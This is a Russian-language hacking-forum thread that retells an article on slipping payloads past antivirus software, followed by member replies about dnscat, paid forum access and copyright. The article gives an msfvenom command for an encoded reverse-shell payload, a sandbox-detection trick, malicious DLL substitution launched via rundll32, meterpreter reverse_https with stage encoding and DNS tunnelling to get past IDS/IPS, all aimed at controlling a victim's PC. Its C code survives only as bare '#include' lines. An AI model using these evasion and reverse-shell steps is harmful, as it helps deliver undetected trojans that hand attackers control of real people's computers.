![]() |
Приветствую всех!
Во время блуждания по сети в поисках интересующих меня ответов на вопросы, мне попалась на глаза занимательная статейка, которую я просто перескажу в переводе. На мой взгляд, она служит неплохим предисловием к теме Ondrik8 в разделе, доступном пользователям групп Paid Access &GreyTeam Итак, начинаем... Общее Как упоминается в статьях CIA Wikileaks, антивирусное программное обеспечение можно обойти, приложив некоторые усилия. И, несмотря на то, что эта статья предназначена в первую очередь для пентестеров, она также покажет, какими способами можно обойти антивирусные программы и ограничения. Здесь представлены некоторые идеи о том, как работают [S]xak[/S] пентестеры. Будут рассмотрены некоторые основы, которые используются для обхода антивирусного программного обеспечения, но, как вы сами понимаете, этим данный список не ограничен... Иногда при тестировании на проникновение можно столкнуться с ситуацией, когда антивирусное программное обеспечение всегда обнаруживает ваши полезные нагрузки. В этих случаях вам нужен хороший способ обхода антивирусов. Описанные ниже методы довольно общи, но работают практически со всеми антивирусами. Поскольку основная полезная нагрузка выполняется с помощью msfvenom, можно утверждать, что полезная нагрузка(метод) должна "палиться" AV. Кстати, метод обхода антивирусов также уклоняется от песочницы. Уклонение так же просто, как попытка открыть какой-либо файл, который обязательно существует при каждой установке-использовании. Например. "C: \ windows \ system.ini" - обычный, но важный ini-файл. Если этого не существует, мы находимся в среде песочницы, созданной антивирусным программным обеспечением, поэтому мы просто ничего не делаем. Когда осуществляется переход в нормальную среду, файл найден, тогда полезная нагрузка выполняется. Отправив файл на Virustotal.com, мы получим вероятность обнаружения 1/59 - всего одно антивирусное ядро обнаружило "подставу". Кстати, напоминание новичкам и забывчивым (я добавляю от себя лично): Отправляя файлы наVirustotal.com, вы сами "палите" методы обхода, способы упаковки и шифрования, ведь антивирусные компании получают файл в качестве образца. И он будет немедленно внесен в базы (и способ его получения). Есть еще онлайн-сканеры. К примеру, я вот вытащил из обсуждений на форуме: https://www.pscan.xyz/ http://nodistribute.com/ https://www.ziscan.com/ http://stopvir.us/ Используемое программное обеспечение:
Нужно отметить, что Windows Defender и, возможно, большинство антивирусных программ станут "сигналить" о том, что "какая-то программа пытается подключиться к Интернету". Конечно, в ситуации тестирования на проникновение это может быть показательно по причине грубого написания кода эксплойта, который - напоминаю - нужен нам исключительно для тестирования на проникновение. Тем не менее, если вам удастся получить оболочку, изменив .dll какого-либо программного обеспечения и(или) обманув пользователя для запуска исполняемого файла, вы можете легко получить управление атакуемым ПК. Здесь можно перенести шеллкод на какой-то уже существующий процесс, который уже имеет доступ к Интернету, использовать существующие программы для запуска вредоносного кода, чтобы обойти ограничения на whitelisting. Способов избежать ограничений - множество. Конечно, в сети атакуемых могут быть некоторые системы межсетевых экранов /IPS /IDS, но их также можно пробовать обойти, например - используя SSL-кодированное соединение обратно к жертве. Но этот вопрос выходит за рамки данной статьи и гораздо серьезнее, чтобы быть рассмотренным в открытой ветке. Настройка полезной нагрузки Полезная нагрузка генерируется с помощью msfvenom, который является частью пакета Metasploit. С msfvenom можно создавать исполняемые файлы и dll-файлы прямо по ходу организации атаки, но, поскольку мы пытаемся уклониться от антивируса, то мы создаем полезную нагрузку в формате вывода C-стиля с помощью следующей команды: Код: Код:
msfvenom -p windows/shell/reverse_tcp lhost=10.0.0.8 lport=4321 -e x86/shikata_ga_nai -i 5 -f cОдним из способов обхода антивирусного программного обеспечения может быть создание вредоносного *.dll-файла и подмена некоторых существующих .dll на него несколькими способами. Как обычно .exe-файлы считаются опасными, они на виду и запоминаются в процессе работы даже простыми пользователями. Но DLL-файлов гораздо больше и простые пользователи обычно не распознают DLL-файлы, как вредоносные. А потому в них куда проще внедрить участок кода. Для целей тестирования этот фрагмент кода - это очень грубый .dll-файл, который можно запустить из командной строки и который не имеет каких-либо других функций. Код: Код:
#includeКод: Код:
"c:\MinGW\bin\mingw32-g++.exe" -c c:\dll_test\main.cppНе обнаружено ничего (0/60) антивирусным программным обеспечением. (а вот после проверки - наверняка будет!) Теперь, чтобы проверить эксплойт в деле, установим multi/handler meterpreter для ожидания соединения. И запускаем полезную нагрузку из эксплойта с помощью следующей команды в командной строке: Код: Код:
Rundll32 exploittest.dll,@DllMainИсполняемые Как и с .dll-файлом, проверим уклонение от песочницы, проверяя какой-либо существующий системный файл. Если файл найден, выполнение кода переносится в полезную нагрузку. Код: Код:
#includeКод: Код:
c:\MinGW\bin\mingw32-gcc.exe exploittest.c -o exploittest.exeЧтобы проверить это, multi/handler может быть настроен так же, как в DLL-методе чуть выше (обратите внимание, на другую полезную нагрузку) просто выполнив файл. Злонамеренная полезная нагрузка через системы /IPS /IDS В случае наличия систем /IPS / IDS перед жертвой эти файлы должны пройти через них, но они будут пойманы. Если фактические файлы будут пойманы, просто создайте защищенный паролем ZIP-файл и получите файлы, к примеру, через HTTP. Итак, что-то вродеwindows / meterpreter / reverse_httpsможно использовать в качестве полезной нагрузки со следующими изменениями параметров: Код: Код:
EnableStageEncoding trueНу и если все остальное терпит неудачу, то всегда есть dnscat ВЫВОД Поскольку атакуемый получит эксплойт (троян), который не обнаружен антивирусными программами, вы получаете управление атакуемым компьютером. Конечно, Windows Defender и антивирус имеют ограничения на новые подключения, но, к сожалению, эти сообщения игнорируются очень часто. Поскольку антивирус ничего не находит, многие чувствуют себя в безопасности. Нет и еще раз нет! Основная часть ответственности за безопасность по-прежнему лежит на плечах пользователей, а антивирусам / брандмауэрам /IPS /IDS нельзя доверять, чтобы быть защищенными. |
Как не зайду на форум, всегда что нибудь новенькое и интересное... как то я упустил утилиту как dnscat,посмотрел в гугле , сейчас уже есть dnscat2. Еще раз убеждаюсь, что бы быть в теме, нужно обмениваться опытом, и постоянно учится.
|
kot-gor - спасибо. Я этот момент что-то упустил. Ссылки на DNScat и клиента под PowerShell под него:
И dnscat2, и dnscat2-powershell |
Цитата:
Цитата:
Заблокированные к сохранению странички я успешно "сканю" ScreenShot Reader-ом и также сохраняю в любом удобном мне формате. При хорошем по мощности ПК все это занимает 1-3 секунды. Как раз эту статью я сканировал, а потому ссылок не сохранилось. Но для грамотного пользователя это не беда: спецкоманды Google и ключевые слова точно укажут источник. Об этом знают все (я полагаю) Вторая причина, по которой я бы и в этом случае не указал бы источник (я ведь не присваиваю себе авторство, о чем сказал вначале статьи): данная статья - это предисловие к более серьезному вопросу с более серьезными инструментами, которые потому и скрыты из открытого доступа. Для специалиста она - пшик, обобщение, он это и так знает, потому что использует на практике. А новичок вряд ли заинтересуется оригиналом, поскольку если он владеет английским языком на уровне понимания беглого чтения, то я небезосновательно полагаю, что вся эта информация ему уже знакома. Ведь и мы черпаем информацию из забугорных сайтов по причине безнадежного отставания России по части компьютеров и компьютерных технологий. Но я учту на будущее это пожелание. |
Цитата:
Я сам пришел сюда не так давно, это видно внимательным. И когда-то тоже так думал. Но - пойми - это не жадность, а осознанная необходимость. Поясню: расположишь ссылку на софт или саму программу - а где лицензия? Расположишь книгу - а где права на нее? Кряк или перескан - нарушение авторских прав. Станешь публиковать способы обходов защиты, взлома и вторжений - прищучат через отдел "К" (противоправные действия). Это не только здесь так. Везде. А чтобы избежать "кулхацкеров", которые сразу "запалят" по неопытности и эксплойты, и крипторы, и уязвимости, новичок должен показать, что он понимает ЧТО и КАК делает. Если неопытен - научится (было бы желание). Прости за сравнение, это к тебе не имеет никакого отношения: это все равно, что дать обезьяне пулемет и вывести на Красную площадь. Хрен ее знает, - когда она доберется до спускового крючка, когда нажмет и куда будет направлен ствол! Так и тут: цепанёт эдакий "крутец" хороший инструмент, прицелится на выложенную (к примеру) здесь уязвимость 0-day и полезет, грубо говоря, "Сбербанк-онлайн" вскрывать. А когда возьмут за задницу и прижмут, то он и скажет, ГДЕ это все раздобыл.... Так что не обижайся. Ты участвуй, помогай другим и делись, чем можешь. Покажи, что хочешь быть тут. И я выскажу чисто свое мнение насчет "наград"... Надеюсь, никто не станет возражать известной фразе: "Всякий труд должен быть оплачен!". Ну так вот тебе и ответ вместо обид: если под словом "награды" ты подразумевал деньги, то тогда плати - и получишь доступ через Paid Access. А если "награды" для тебя это баллы, коэффициенты и ранги, то, соответственно, умножай их, участвуй, делись и придешь к аналогичному результату! Цитата:
В W10 появилась хорошая функция: Microsoft Print to PDF Вот он сохраняет без искажений или они минимальны. Даже ссылки и их свойства работают. А для W7 я много чего перепробовал и остановился на Corel PDF Creator (прицепил пример). По искажениям - довольно сносно, вот только без ссылок. Они отмечены, но неактивны. Если кто нашел что-то получше - поделитесь. |
Мы отлично поняли друг друга. Для меня тоже информация (то бишь - знания) дороже денег.
|
Статья как всегда на высоте!
|
|
Автор, меня интересует, а что должно в коде идти после #include ?
Просто я не понял, что там подключаешь? Или это опечатка? Дай ссылку пожалуйста на исходники своего примера! |
Цитата:
Только в КАКОМ коде? В топе их 2 с интересующими моментами. Показываю скрины с обоих (и это не античат ): Цитата:
Извини, братишка, - ищи материал сам. Поверь - это очень просто. |
| Время: 17:25 |